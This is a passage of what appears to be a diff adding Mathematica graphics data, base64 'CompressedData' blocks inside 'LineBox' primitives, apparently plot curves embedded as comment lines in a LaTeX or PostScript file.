+%1DnC7xYPGQ8NtN/c//GDPB4yHho4LPTEwxhTPjIeGhj4wmluhRMfGQ9NLJ7n +%mGv8H588NHHZ7mzu/ko+eWjij+WDrPjWWuShiUM9n54O3a9FHproO9Y5/0m0 +%FnloomCt/IGmTJs8NHG00ZFz9x21yUMTM0cbX4i9qU0empi9YeGrzdXa5KGJ +%Xvo9TS+P1SEPTaxVVV3c76NDHprYMNZ2uixPhzx4+NEnJXbXSAF58DBb97z7 +%xzMC8uBh2zLR5oGFAvLg4QHhp+f3xgnJg4cRws6zVl8VkgcPraICnnu0C8mD +%h14jQjcPXyEiDx7GpEws8owWkQcPV1zemBzdT0wePFzjsF5Hx09MHjzUuXtS +%5ceTkAcPJzs6TQ/YKSEPHgZO/xLhXCQhDz4mdptgumiVlDz4uPCrVpRPhpQ8 +%+HjQZoT/uZUy8uBjr415hx8UysiDj6tc5vYeOUpOHny89DlzY8RROXnw8YP4 +%2ODrCXLy6Dh+bFe1XS8FefCx3n/ZZ4tdCvLg45ul2VYv4xXkwccGvW3hdwco +%yYOPe54UTHjkqyQPLbzbdNf7AkdFHlrIUWPfEBcVeXT0kUty5/FVKvLQQr7R +%zaMz9uqSR0dfRW7eoKfUIw8tdO/WLXFihB55aGGd1ZKK9W765KGF41+08r7P +%NSAPLTzbeGeVaIEheWihmb5sW85FI/LQwtHDQspjbDuThxbqTQ8JHBXclTy0 +%8NGVKzfH2fUkD208suB8pPknQ/LQxrkbyiR29/TIQxtTp7aeKF+rSx7aOOrC +%4WEXL6nIQxsrrU5OsNVSkYc2Opd6f15yTkke2rhlkNmQe4OV5NFxXpgZWaZm +%sx7a+CT3WZoikPXQxvCAL9Y/VrIe2vhc5jRvuaWCPDr2HbF5eaucPHQwNt7k +%dUGHN+Ohg8szu38bf1dOHjroOoNTnO0hJw8dNLh9xX/Wajl56ODH7Zn+AyfI +%yUMHHS8WbhlqJicPHayrWcPvLpEjc//UwWNdgnq45cvIQwc1LfudCQmXkYcO +%9p/le+K+p4w8dNBUEuTfbbmMPHTQwS6g5JO1jDx00LKqzOSEQkYeAlyvv2CP +%WSl7fgjwXtXzlkMf2PNDgJ2Gvm1w/p+UPAQIid39v5+QkocAz37gLb2+UUoe +%AnQ03/Xp3kwpeQhwEH93Yf4gKXkIULVkY9dRhlLyEODI1Z+X+LdJyEOAe0VR +%B6pyJeQhwJeuv+v6f5aQhwBX5R4QTA2XkIcQ+00ct2nwNQl5CHFSXO2vn14S +%8hCi/y/dk2N3SchDiI0ub9bbr5KQhxCD7zSaSmdJyEOIptmFtStGS8hDiP8z +%vvlmmoWEPIRosnSx6K2RhDyEuDVm966XOhLyEGL/5o2FoxvY65UQy276/BhW +%ICYPIVb0vOMXlComDyH+1+p95UismDxE+LzfgvNxEWLyEKEgPUCx976YPEQY +%O2uA8mSAmDxEGCbuv6X5jJg8RLguUKV8e0RMHiKcK3jUNcdVTB4i9JiQmDp/ +%g5g8Ova33QgwXComDxFW/HvZ1XyOmDxE+H2cfOGRiWLyEOHPuV0/m4wSk4cI +%Rw4yGS4cKCYPMb7rbJ08qLeYPMQoWBQ86XInMXmI0eHZiU0oF5OHGL3HDbja +%U0tMHmI06GPUbNMiIg8xrkz1MThdJSIPMYYeLQs1KBSRhxiN6nPOJv5m7x9i +%PHTWI/p1sog8xHhsAudK1icReYjx48pae6uO+w3jIcbS10cy7j8XkYcY7beN +%z5j/REQeErzdq+Rh3/si8pDgogMWm0yDROQhQcPN9tEz/EXkIcFrpVMXXfYV +%kYcE3Ve7L5Z6i8hDgvsWHku//cfhr4cET9WPX7n6gIg8JPhTc/GC8btE5CFB +%jwdPJkzscGQ8JDgqLkTo5CQiDwka3NnW9f5KEXlIMLXx8TtpRx8wHlI0Gfrg +%/ml7EXlIMfRmulV/OxF5SHH1ovT9RZNF5CHFSdue178eKyIPKb5clnwkzIb1 +%6LhObBxhGT2M9ZCiw+ry96UDWQ8pfnXPnzDQgvWQ4qgVQi/P3qyHFH3vnX/R +%2p31kOJQ3dTo451YDykG8swCzfVYDynumvhQniVjPWR4e2LdqYdC1kOGd/wm +%p/ryWQ8Z1h+OifHmsB4yDGyy5V5uFpKHDAsXqVIj64TkIcOf+d2tKyuF5CHD +%AylXDEeUCslDhpv2nfjtWyAkDxmeOjjzCDdHSB4yPGuVevvgbyF5yHDv1AVN +%inQhecjwtYk793GykDzk2NX8Ysuar0KqR46iVP5Q889C8pFj3kuDSS2xQqpP +%joYDWuf/ihaSlxxf+PUoi38lpHrleOOkdvjXF0Lyk6Pa521i1jMh1S/Hx+1G +%CZww9vlMjm2Lp6RZPmLzkGNBj/bY9cFCZN5nOu476/YWP7zL5iNHq7DgG1q3 +%2ec3OVaevW3qdIPNS47lccqA1EAhPT/IMZ0/ycTen81PjsZDV+/4eVFI/SDH +%6c5vmredZ/OU48iN7p7Kc0LqDzl6XXU2Up9i85Xjhv5Nuq5eQuoXOQb5BPUb +%cZzNW47TJA8rtDyE1D9yjPfwP/T7EJu/HOf17rv69QEh9ZMcz7Xoj324l/VQ +%YJ5Gb7M7bqyHAuHBsCF3d7IeCkx4fu126HbWQ4G2ZxsHfdzKeijQftr1psJN +%rIcCM8y/LFFuYD0UaB0SrTt+HeuhwHqfrF0HVrMeCtTvMz3z1QrWQ4FCboNS +%uox9flZgnx4tUSsXsx4KfHuv2kvtyHoocMWXDVEmDqyHAo2CTZeem8d6KNBj +%qnO99hzWQ4EH7B9P9LBjPRToGHFHXziD9VBgb4d9tRemsh4KvHz1XTeLyayH +%Ant8CV8XM4H1UOCMkVYjncaxHgpcN6abg2oM69FR75Tvs97ash4KxM3JbXtt +%WA8Fpr25fWXkSNZDidf1lpa3W7MeSuzbuVfEx6GshxI3Ogi0AwazHko85/Xo +%k6sV66FE25/LdtoPYD2U6PZsQdJIS9ZDiQOv6Bv0sWA9lCi4yNtoYM56KHFl +%U6yt1JT1UOJUt4hRot6shxI3KOSPJMashxLN93vl6PVkPZTY/L6+xLg766HE +%IapVUuuurEfHfHe+JNh1Zj2UOCWiJGyzEeuhxBXVRulnDFgPJf7PetaiZ3qs +%R8f+4bSwPBXroURV1to4QyXrocQj/V2WzJKzHkq8O2DNvpNS1kOJfcIUNz+J +%WQ8lFojPfFWKWA8lBqgn9VoiYD1UKHTg6t/XZj1UOPfEleh2Puuhwp+xr7Y7 +%8FgPFcZ3VWs+0WA9On4/cmO2Lpf1UGFfYd85u9vZ90cV3ihKm5/VKiAPFdrc +%mxNm1yIgDxXqn71l/KpJQB4qPFUxy2FYo4A8VDhoZoDmw3oBeagwwSZpgGWd +%gDxU6HqWj8E1AvJQ4dV1Rw8PrhaQhwp/VxQufV4pII+O96i4M7mTKwTkoUK/ +%DTv6p5UJyEOFlY+G/LOpVEAeKtxxcYAbr0RAHh3vJZHL1gQWCchDhbc1upWP +%7nhfZjxUqO57Lfp3voA8VLjxznOlR56APFR474X0i2WugDxUuDpzSmJatoA8 +%dPHMBqeU41kC/D+QSguY +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113dczfsfB/BzTvPMzoispGGEzJtrv98qZFzRtSJZyYpCXDKvkK3749rE +%jcxKSEY5lAZpUlFJpb3XaY9fnPfn+0+P+n7P5/N5v57v8/30MV7lZr+Gx+Fw +%VFwO5+dPdg3+Y5N4+KVq5W79wOm5nofA0/+3/IGu7PdzEN594CYdqFY+73u4 +%bN7z6/Cs6XVygozdvwX6g/qU18VWKS9f+nndg0fWhkbCzVX0fCCk7Bv4qFZe +%pSyf9/MvwdBjiWr0ndBK+vxT6BD6xJg4VioF6X7ukwShMKbG1HA1p5LGewHZ +%++0H7btVoTR3PBOhGhQGO2rTps+3raDxX4P+DdstzWXlyltdn073ewOhltbC +%ZWfKab63kL88dvbVUeXK0b+uSEiV5ReeTy2j+d/B1ee6G5bvLFNGqgZ1zRAF +%O5xbi+t7ldF6YuBqovuk2eGlSvtfE8ZCg8fgHNflpbS+9xAbPnuZE7dUmev5 +%c8APwLkqCRD6ldB6P0LyuaUuJ2xKlFt+Ls89Hqwnx71NKCim9SdA2Lp9JzKP +%FCvVGkmg52Y18uHAYqonCYKa3nNmxBYpbX9NkAzXJAc2PlhXRPUlwy3jzsI4 +%3SLlz9kcz6RA5tkn7hF3C6neT2CYE3l5l22h8lc56Z8gZmfeAlVRAdX/GdxP +%PHIY712gNPq5nL6pUGIc6jhlQAHlkQq/dwwM1YvKV651+XmlQdEq8YQbq/Mp +%n3TQ+K3kdQM3X/lzNP3AdEjs7GfW7cYPyusLRINQ0jTph7Lh53CqL3Aq4suQ +%S5l5lN9XUOVmFPJ25Skn/xowA/zPXTQf2j2P8syA50NHfen+JFf5a3mHM6Fk +%pgKi7HIp3yxQZedNtizPUcZ//HllQYjzNff1R3Mo728wKLf4nINZjrLbrwVm +%w8fBR5b3P/Cd8s+GaTsvhotCs5W/hnP8Dk5X27ttrPhGHjkw0WnO10mm36ie +%HFgd86Jn4OIs8smBsOJpIT6nMqm+HDjyg38t+20GeeXCbW2vRc9UX6neXPC2 +%2u/FM/9KfrnA3eSv/W7pF6o/Dza+Oe7deiqdPPOg7MDX9TeUaZRHHvydM2hj +%YnUq+f6AKzGlzm7GqZTPD5iXYM7bN+8zef+AJ2KTqsoDnyivfPhkG+SQEpRC +%/vlwPim0b7/sZMovH2xsj1/OFyZTPxRAwve5vbnjkijPAugR4NA8LC6B+qMA +%rlVsSZ9lGk/5FsK9U3H3eZ5x1C+FIGlW/uuZ+J7yLuwab8GecNNY6p8iGO9+ +%4EzhjmjKvwgcbTSuPIt9R/1UBDGWv3lb9owkj2Lw06yb4r3uLXkUQ7NjBkdv +%k5I8iqFu3o8HI7XDyKMYcFl/j9arz8mjBB79+8a1bUQIeZTAyqiAxNa3weRR +%Am8MF036cuMheZRCt1PtYX7Pbyt9fnmUwoDjh5J/O3eNPEohzF0ybo3DGfIo +%A6ltcsLzU0vJowwKl/+5aPPxo6D2KINhTwt+t553GdQe5ZAoVsaeHn0L1B7l +%0G3btXHHpj4AtUc51C31i9g/LBjUHhVQNfNA46vwp6D2qADz/unbP9o9B7VH +%BdhscL75Kf8VqD0q4UyNM7zYqwS1RyW0FS7vcffkW1B7VEJvQWa3MY6RoPao +%gjEF5+18LaJA7VEFpx/vbjvOiQG1RxV8Xvjmo0NqLKg9qkF6LNBP+eAD1VMN +%a68EO1sd+ghqn2qwG7Dkej+nBKqvGvz17Zf0MkwCtVc1bPg2vL1EmEz1VsPY +%1QLfqNZkUPtVQ+VX5Qf/8hSqvwYMBla+cMn+BGrPGuAG7p1skfyZ8qiByg+T +%fpS9SwW1bw2sjO5Xe/tFGuVTA6/GTHA7F5QOau8aMJlqZ+3l/4XyqoXIurm3 +%V1//Cmr/Whi4fyLf5UIG5VcL1teK3Lz/yQT197MWjF2PZoeczKI8a+HJvVnv +%dY99A3V/1MLmiKySE0eyKd866FXzunrm4e+g7pc6GBXTuf+SVQ7lXQfc2kWB +%+pE5oO6fOrjbvqZ4ik0u5d/1/O4B3lrRudRPdRDwMbl9v20eedRDbIXy7am4 +%PPKoh8yLgZZWdj/Iox7e7L5w6+anH+RRD2aen4fdXJxPHvVQ5j55vEd2PnnU +%g2dzg26+cwF51EPtjUdT+OUF5KECYWhP5+JtheShAvel//O93lZIHl33VU4h +%zYeLyEMFE6Lt+hpJi8lDBa17/+gluVJMHioY1So/8W5ACXk0QIjDswKbJyXk +%0QBr37y56Iul5NEAW+L8xsQllJJHA7xvaX4Wv6yMPBogvnlQw7OKMvJoAGXd +%UdHefeXk0QivfDJmWEoryKMRhnlJL3z+r4I8GiHgjPNchzGV5NEI/w4LPZH+ +%oZI8GmGUym6X3Yoq8mgEh2aVLKKhijyaYE5q1jKT6dXk0QQlw8w+LztbTR5N +%IE57eXFUTjV5NMEGvVozT4sa8miCfO302fN315BHE3zof8Ip4n0NeTTB5rTT +%VyJ61JJHM3B2Xk+yX1dLHs2QluP7ZF9XX6o9mqGh3qvZll9HHs1gpJ138fGS +%OvJohhGpbSvCH9aRRzMknvxTd3NnHXm0AHSGXky0ryePFhgzufVOhn89ebTA +%FIXlf0da60H9vmwBB72ipsa5KvJogVjf7lLjOyryaIFkc9tGfoeKPFrBcOti +%8aMFDeTRCrevX3GxCGwgj1boF5dvtFmnkTxaISfwndOBlY3k0QomRgY/Noc1 +%kkcrHHlwr8aiRxN5tEF+5KrEDI8m8mgDX/25591TmsijDXQ0C3PLRzSTRxtE +%X4j0W+nTTB5t0DvJ1zClupk82mBZvHTxNPsW8mgD/rT3CyKftpBHOzxtfHd/ +%aY9W8miHovSG97y9reTRDkGizVMS81rJox3mbDuT/nZGG3m0w4qNx4wKgtvI +%ox0875Q9ntm7nTw6IPjI56aWw+3k0QFXt3OOltW0k0cHuKnyAu2Xd5BHBwQd +%uh5mkNBBHh0wanODxazJneTRAaNzd5xvDeokj04oWeJZcEnGQbVHJ7wr2nRE +%PJuDao9O+G+tcdRcbw6qPTqhbrGv65ZIDqo9OkF/4PUH2zhcVHt0wgl/XbcN +%k7lIxw8UJI05u2gvF9X1cBCl9scwnItqHw6aTkgy+62Di+r6OFh4PmCbFfJQ +%7cXBD/d77v3Li4e/ynXhYNbMBSPjY3io9uOg2bkZWavEGqh+P3DQ4KzK64/5 +%Gqj25ODMx3O27L+qgeo8OCjteBpiXqiBal8O8rYlr5w+UhPV+XAQ7jcpyvZq +%otqbg8YbRm0e+1ET1XlxUf/FX74j+2ih2p+Lnat6DO3cpEX5cfFl8FiLgLda +%qO4HLh4VGQ9ebqBNeXLxRVzfxQPctFHdH1z8ZJQ01uK9NuXLRV9pypgL/XVQ +%3S9dOXlM2Hf0kA7lzcVlwvVLpIU6qO4fLjYt9xi3c6Yu5c9FLc+P2U3Buqju +%Jy7+I9g47mofPnnwcNhL311hx/nkwcPoDudTfm188uBhvJ5BwPGtAvLg4d8O +%UWbPywXkwUOx8/LprzYKUd1/PBxfHFflXyUkDx6+CVq3a+guEXnw8O7Cjffu +%6orJg4cbfWIL4q6LyYOHt5Pfz5AF9SYPHnb7LBoSy+1DHjwMM3QOaV3chzx4 +%GGR6rLdhSB/y0MC/0/Iza7obkocGZk8JsRXuNyQPDVz1oXTUkkpD8tBANIve +%2telL3lo4Pht33pvKOpLHhp4v8+2qhEeRuShgTcW/jN/rE4/8tDAThPrP244 +%9iMPDZQs3DHHLqwfeWjg14FBwQJzY/LQQM9v376Y3jEmDw08qLI/vWKSCXlo +%otuIJIlzowl5aOLIwRn+O8pNyaPr/iGRbdX8/uShiQZZ3+dO6DGIPDTxYWd8 +%jCKjJ3loYknACkHIoO7koYmPex61bXymTx6aOH5MmMAxWUEemijWd/3DaKiC +%PDTR8L1NYa+HcvLQxChweatvIycPTVyy0ju6tlxGHpr4+ftTU/xPRh5aGP17 +%4m7jlTLy0MIBPoOzjg2UkYcWLo25u1G7XkoeWniJJ+x5LUpKHlo4u1D/wror +%UvLQwo+9dwYleEjJQwtv3g84NXWelDy0MP+CXbTbCCl5aGFa6qvF9TIpeWhh +%k7zVtVeZHnlooXsfk+jqED3y0EJN/81nZYf0yEMba819Xcct0CMPbXwdHjWF +%a65HHtoY9Ubv3ymdEvLQRp6Z7+176RLy0MaRL+6M7PtYQh7aaOx83Hn9aQl5 +%aGNV+czgTa4S8tDGluKpjzVnS8hDGz1qb+jqW0jIQxtNjZdpe+pJyKNrfQOu +%pPSvE5OHNmrsSQpsSxeThzb2EY/dXRYuJg8dLHGqds+7JSYPHdTP0f6ccFJM +%Hjro8yfY+G8Xk4cOLg/33Dx/uZg8dNBb9iQ2aYaYPHTQSDJimNRSTB466G/S +%mqpjLCYPHTTfGaJ5VywmDx107N1rZ2WLiDx0cGSywcfEYhF56GD47/XdbNNF +%5KGDzQ+99s+OFpGHLmbrTHzyKUREHrpYzdsd8e22iDx0cfSGqMmrzovIQxeH +%9c7hO3iLyEMXX05J7/F6p4g8dLG5V8m8UxtE5KGLi55effDOUYTq/VMXvxqp +%+jrYichDF2M8suNmW4nIQxc5OS79L1qKyEMX2wyyD04wF5GHLh75Ni1wmKGI +%PHQxooeBdJtMRB58/LtgtCNPW0QefMy//1dxVouQPPgYv2b31tau96nag4+v +%XgSecCoQkgcfl5ekGWhkCsmDj896xRgXJgnJg4+Dd52M1IoRkgcfT1gIuCvC +%heTBx3spQcl1T4TkwcdvB9Ymvr4vJA8+2rqeLgq7KSQPPl6/sci++qKQPARo +%5yX0/NNHSB4CXLpte1WRt5A8BHhO5BR2b7+QPAT4tv2R34W/hOQhwDcnF395 +%7Mb2DwFqu64c27iW7R8CDDgy+tnqFULyEODU0szHzYuF5CHA0nqN5KfzhOQh +%wPXNrYfPzxSShwCXcS1DL1sLyUOAbgdbPkVMFJKHAEuMv6tEY4TkIURJdIVo +%13AheQgx2DsmX9OceQix0Op+aJAJ8+iqqxjSPfswDyFO/2qdv6o78xCi6Vfj +%UBcp8xDioI8Hg70FzEOIs2dGit9pMg8hjjBJutirU0AeQuzu1/j2RLOAPLpy +%0fJw6V4vIA8h5o/au+ZFpYA8RJhitX7dthIBeYhwT8PVy9PyBeQhQutX872G +%f2f7uQgnjHs/aEQG289FuNEsbfTUVAF5iNDC/4iPe5KAPET4wcZD+1GcgDxE +%6DVP8kQjRkAeInx18bnTxggBeYhQ3zH0ZmG4gDxEqMed+JvHCwF5iNCy4mu/ +%biEC8hChysMuOPqRgDzEaFw9euvxhwLyEOPShA6bFXcF5CHGPtutA6fdEpCH +%GJ10Ok5MvCEgj6733mj9xdZXBeQhRpdHdpccLgrIQ4yTps4u3X9OQB5iHLiE +%0/+pj4A8xJguWu/SdJJ5iDFlgK/FzGPMo+s9G9Gt495h5iFGf4HLgx4HmYcE +%b1yO/ufcPuYhweDq0j2Gu5mHBL+9rjj55C/mIcFdaXXOCz2YhwR3xjsO0trC +%PCRYse+k6s0m5iFBt14Bhkc3MA8JDrsksF26lnlIcHPGWfPxzsxDgsbufZ+a +%rWQeEuSb/q+ppxPzkGBBt57+PZcyDwmKeesHmy1mHnq4qseQK+MWMA893JOn +%cXixPfPQw5PWAScP2jEPPbxzQFUQMpt56OH7IXOSamcwDz18azD56LjpzEMP +%df13NR+1YR56qCzjD86bwjz08EuMz1MbYB56aJt57a+gicxDD+tdtf82Hc88 +%9DDZ82xf39+ZhxT3h5z+x9SS1SPFpcX3W4JGMR8pxqc8gqkjWH1STH3s0TvP +%gnlJ0fSDzcIjQ1i9UozrnDxplDnzk6JzxSyrwgGsfik6ZZ22v2nGPKXoenXo +%59UmLA8pZo9qX2jRT0DnGSnaD18wqMOQ5SPFT52Gw1J7M28pHtedavekJ8tL +%irEjxuZeNBDQ/w9SfL3uqMehbiw/Kc77WuC4Q8H6QYobrrQI3GQsTynOsLm4 +%c5Me6w8pHtq1ymarmOUrxYhYTYO9QtYvUsw38Lx9is/yluKQXe9e+umw/pHi +%rPMh+W+0WP5SNJ46uyNPg/WTFDO+WFQJeMxDhqtj/XljOcxDhhkV3kUbOth5 +%RIaH95Q5/td1HlF7yPBskEonp4WdT2RoLbr+p0kznzxk6PV41sv1jXzykGFm +%wZX1z1R88pBh9/DWYzr1fPKQYa0lRC6r5ZOHDDfYTk57Xs2n75sMeZYPAntU +%8clDht3qvYP3VPDJQ4Z7jYOHFnbti2oPGbbt8Hr5ZymfPGRoar9hX1Qxnzxk +%2KNuz/cJRXzykKEiup/LswI+eciwMbNshmU+nzy66onIcnyexycPGRY6KEWQ +%yycPGTqvtDr64TufPGRd++W6IodsPnl0Pe+4Pqk8i08eMrx+uWz6oUw+echQ +%33SWX98Mdh6U4z1RfHb4Fz55yFFof7f7inTmIceTcycaaacxDznGrYvTfPSZ +%echxzb31lss+MQ85BuS2TpekMA85Jtne3hSRxDzkODzlwlLPROYhx/xdlncs +%E5hH13p8EuPqPjIPOe6LmjE+JI55yHGuR3CO5wfmIcd0T9v/Wb1nHnLsNcRv +%oSSWechxXuTV4qxo5iHHPSr90YFRzKPr+VkNd7zeMQ854qL+q5dEMg85rm41 +%0bWMYB5y5G7b1iF/yzzkeG7B/rJaJfPoWp972j9pr5mHHHdecVgWFs485Cg7 +%fbrzVhjzkGPaC9l2n1fMQ4HXE9eH73vJPBRoNUU0x+0F81Dg6CVyyernzEOB +%X6sbZQ6hzEOBKxx5bfOeMQ8F7iqT1c4OYR4KfPhxnfGsp8yj69z3tDhx5hPm +%ocC+kdut/njMPBTIvdB9rX0w81DgmS9xdQ6PmIcCqw6dPLc6iHko0GtC761u +%gcxDgTNqHhzeG8A8FLjK23n86YfMQ4ELx0zk3HzAPLrGFy6c8ew+81DgvLuu +%ofH3mIcC1xTuVRXeZR4KNLvnNIB3l3kocOe3yQeN7jCPrvWIXGPBn3ko8Nje +%KcNX3mYeCjRasrvl0C3mocDl/LOj7vsxD31U8aOPp/zHx/8Dq98lgg== +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw92XVYVNvXwPGhmWKKDhEMbEUM1Ktrid3YCihiKxa2qIAoBnaDioqg2Ipd +%iIFSiiAlId3dHe/8nLXf+ec+4zDnnL0++3tm5rlmyzfPWaXM4XCKVTic//2X +%PbQjVt3cYFYdulf78aRs1+3g/sXs10Yue34Ivlu9ilpRXRX6potX6ew3p6D3 +%mIPB81Kq6PULcCLT8uSYz1WhV3z/PeDzLT+b7vfY31+HuqG1aZyzVaFls//3 +%L/6w03WFS8Ju9v5AMHs28NatZVWhvOSALaN5QbCxuKlu5WR2vHtw9IJdTI9B +%VaG9HU5/qe/1ENLfKIen67HjP4Zpa0yFxp2VoYHydycHPIX7g7qt3xhTSecL +%hulPXSKe+1WGWv17PIfsgLEJRRsq6fwv4Ph7nrbhf5WhX+t7yc/wEj41GBkO +%4lfS9byGjdHN0aNTK0LnKE4Ih78b3xp5r4Ku7y04mTSt67e7IjTb9X8HfAfn +%qnfacSdV0PV+gKqCRz9zdCpCXf53eVtCYAVf9jMor5yu/yPsteqMdHheHqrQ +%+ASeE0MylDzLaT2f4Exd3RV/2/LQyf9O8Bly7xvs72taTuv7DEFfs/Y9LC8L +%/d/Z5KcEbtZSf+MPZbTeryAJG3d0t3dZ6L/lJH+F/FuvdvxYVEbrD4PBwxY3 +%yyzKQk3/dzldvoGp46os2/pSmsc3cJDdtNj5tTR0zer/Pb5D65m2Bu+zpTSf +%cICEdKubjqWh/zua9uNwcNjeZdT1/qU0rwiYe0IWeaq1JLThf4erj4CUA15n +%N0SW0PwiIWxa4f1xl0tCx/w7YBSYHjlkpLyqhOYZBQ4TT4z4OLgk9N/leUXD +%U6zf6sgpofn+gKRLQzM5McWhP3/8ewDf763D8avFNO+f0PbXeKXGuuJQnX8X +%GAPqNjONXYYV0/xjIM7JqiFWpTj03+EcfkGBXmhit7gi8oiFoea/nddeL6L1 +%xEJiqvYdX+ci8omFlFNZbh+ti2h9seD+ZKJ7sloRecXBDY/pq9N+F9J64+CY +%hQ8/+UYh+cWBe9SQ/z5vKKT1/4bvzt+KL44oJM/fwD9oc9tZvZDm8RsuRK8d +%1iu+gHzjgXMoKiPxRgHNJx6W+IU/2r2hgLzjYYX/8yz+iAKaVwKExV/tf0Kt +%gPwTYM3Er5eUf+fT/BLA5dZI8fLr+bQfEsFpc9cL79bn0zwTwbjlV1nHsHza +%H4mQvN5NNkoln+abBEe2XJ239Fce7ZckaIjUXbXvah7NOwlS2/5YHFqTR/sn +%GVotM57vs8qj+SfDHu1xHWs7c2k/JYNd9439JkXnkscfaEvj6Usu55LHH2j0 +%MkqOXp5LHn/A13995p4BueTxB56knjxq0JJDHilwf6nG5wffcsgjBRYdsftt +%cTaHPFLgs9vTyEsOOeSRCvYf9h4rtMgJPfPPIxU0jvNVR9dmk0cqSIzUc90+ +%ZpNHGvwYtS324bFs8kgD2xubT36fl00eaVBQ9X1/smk2eaSDU6uKb0JJFnmk +%Q0+uWuOHl1nkkQ53annfrnpkkcdfUDq+bZXTtCzy+AtN+3+46OtmkcdfaNlj +%cufG50zyyICzi7UHpCzIJI8M8I/aYZRcmkEeGZAuWWr52yODPDJB9PSkNFAn +%gzwywW30om5T7/8lj0wYZlh0+euYv+SRBWbFaR0Yn07ryYLgbNNLm9ekk08W +%TEm6vdK9NY3WlwXlPw3/XDydRl5ZcG7bss0e3dJovVlw1K/oVP/XqeSXBd+G +%PJ4cPTWV1p8NxVMKbC0zUsgzG1JOO0494pJC88iGiPx7NrdUU8g3Gy6Kxzje +%vvyH5pMN6a1DL13q84e8s0HT0UAyISSZ5pUDw/bsX58/K5n8cyBsQ6bvvJwk +%ml8OOK5v331mexL1mQOcHxDwQz2J5pkDHaOFWaE+ibQ/cmDtfjO/q30Sab65 +%cMBlgWzShwTaL7mwdUzLk6QZCTTvXNihrZ3aLzOe9k8ubN7/Jsp5SzzNPxf0 +%cnydzynF037KheHdIq9uOPebPPJgdYKpBXT7TR55cClx4tqE53HkkQf+eht/ +%TB0fRx55oPJSctAnIZY88uDswgHWL1bGkkceCPaa2B8u/kUeeTBw29fBNZq/ +%yCMfbv1NO2vTK4Y88iEvob/n6kk/ySMfVreUCKtW/SCPfNCf/eQU/1A0eeTD +%3uhlBma3osgjH8oadgmuh0aSRwHIek/vofQ3gjwKAB1GDMpqDiePArDy3cs7 +%oxtOHgWgE/9+/73B38mjAAbqlZU+nvmNPAogWtnSqff6MPIohNJC7Y/WXl/J +%oxCiFoS/HHTzC3kUgsEj9ef+7z6TRyGI+L0CTiZ8Io9CODOieOGZ9FDyKISc +%Xe5/F2t9JI8i6Dzq0aMJP5BHEfxYfyqqzuUdeRTB+T32vLRbb8ijCIKsH327 +%HfeKPIrAvjN+XDfOS/IogvXBJqKSAc/Jowhix63hdtgHk0cxOP83dMgXyRPy +%KAbPoaf7DVv7gDyK4b8dU5/afAwij2JY/evarHeSQPIohlvzB00dsOomeRSD +%o/vxzqz1vuRRArsTZaVzNM6RRwl8nvJshfYUL/IogafF2fnCn+voflkCHwev +%0zgVtQUUHiWwMtHiid64I6DwKIG6D0fX+krPg8KjFP7Embw9e+wKKDxKYdPQ +%8eMfKvmDwqMU5t6o5Ol+DgSFRykkcDpDAw7cBYVHKchOtK6WTHgICo9SeDKA +%Z/pK9SkoPMpAd+noUVGFwaDwKINIx7KNrtHPQeFRBpaW81ISnr4EhUcZpGWU +%ds649BoUHmWQ9KjT5sL+t6DwKIO+r3q1c1a9B4VHGTzLyf4weWYIKDzK4Rtu +%MRpoHQoKj3IYZZf3adnZT6DwKIe/qycen3LkMyg8yqFL1igfbbcvoPAoBxU/ +%G+G77V9B4SF//ip+KW4IA4VHBbgOM88UrvwGCo8KmOXzNPazw3dQeFTAgfqw +%9PL54aDwqICffYpCvGdFkEcFfM/ZZL17SiR5VMDxSV8Tt46PIo9KaEjs8mgG +%RJNHJej8mvV8+qgf5FEJu0KMcvyG/ySPSpjvn198dkgMeVRC+fvY86qDf5FH +%JVzYaFAxQD+WPKqgclvtm02XY2k9VTAtN6mbnl4c+VRB7dlrZXqX42h9VTB0 +%4fusgXq/yasKmhcmX313+Tf8W+7qKjgU+2D8Lv148quCHqoLQ375xoPi/iA/ +%vn1/tzFGCeRZBUPumZ9W9UugeVTBjA+LDfRME8m3ClaHR5697p9I86mCbDuz +%Oyu7J5F3FaTd/V1+PiiJ5lUNE23umRX0SSb/ajhuONbmiPx7jGJ+1eCghIa+ +%g//QfqgG3xNPHgte/6F5VkP4l+3hBaNSaH9Uw9NUx3Fln1JovtXwsNqzfMfE +%VNov8ufvT2k6/EileVfD/KcvLh6ck0b7pxoM9Mr366ek0fyr4aeT3ZZWx3Ta +%T9VQHBI1aW5hOnnUgFr40sdKm/+SRw28nhxwR6nxL3nUwKrOX3FH3DPIowaK +%DI/lzdLMJI8aWBIWl3jgbCbtvxq4Mi8x6I4wizxqYNyJn2qX52SRRw3EHxUM +%iricRR7y4wVd0xz5N4s8aiBn9Phbf82zyaMGVKpGiB+szSaPGkh92f3Yg8fZ +%5FEDvMXqFcV12eRRC5xxO1rmjMohj1r4e33qT65nDnnUwtnYX5dqInLIoxbm +%LbpiqinOJY9aGKqnKVi8MJc8aqFQ8mtp4fVc8qgFu6v+V98V5JJHLaRr3Twe +%PSCPPGrB4m3IQY1deeRRCy3LNqqvD80jj1pQ43HaLDXzyUN+PXfjK6xn55NH +%HTgdWbLK7ko+edSBpvY9i4jcfPKog3737p850L+APOrgS5vw0rZdBeRRB/7O +%2c+DPheQRx0E1AgdtQSF5FEHPl39e6csKCSPOkj/o4Qp/oXkUQfz/Fc/E5UX +%kkcd3LbS+3DRuog86kB0eELEskNF5FEHPd1X9F0SW0QedRAvOvr9rXExedRD +%2LvqyCXrismjHjbN21jR81UxedTDt4DYpctUSsijHsww7VyYbQl51EPkWusd +%ftdLyKMeYkK6C26WlZBHPdiEZvatGVlKHvWwIXj7voPHSsmjHob0DN22608p +%edRD/rzaO18tysijHjr87p5evKuMPOoh/rvznOnhZeTRABt87ilt0isnjwb4 +%41I+qHZNOXk0gJnJjx0Rb8rJowEe1RzrVcStII8GaN88qmKRfQV5NED+144/ +%Ux9VkEcDTOAZzdzWWUEeDfC8JHWj6pxK8miA99WDs7MDK8mjAQ7ZbpCNaKok +%jwYI/FRlGNejijwaADr2rI2ZVUUeDXBqit7Quj1V5NEIz5qrtNYEVpFHI1zx +%+vAzPKaKPBrhq75j8IHmKvJohIvaSeUruleTRyNYmxuZuc6qJo9GKFvNmRDq +%Wk0ejTAxqb3PpDvV5NEI+guqVIrjqsmjEZRTalzT26vJoxHMqkdpN/euIY9G +%2P22Z8qwBTXk0QidX3LLP3nWkEcTcLtnmxx+UkMeTbDQ4eqU1ek15NEEM/c5 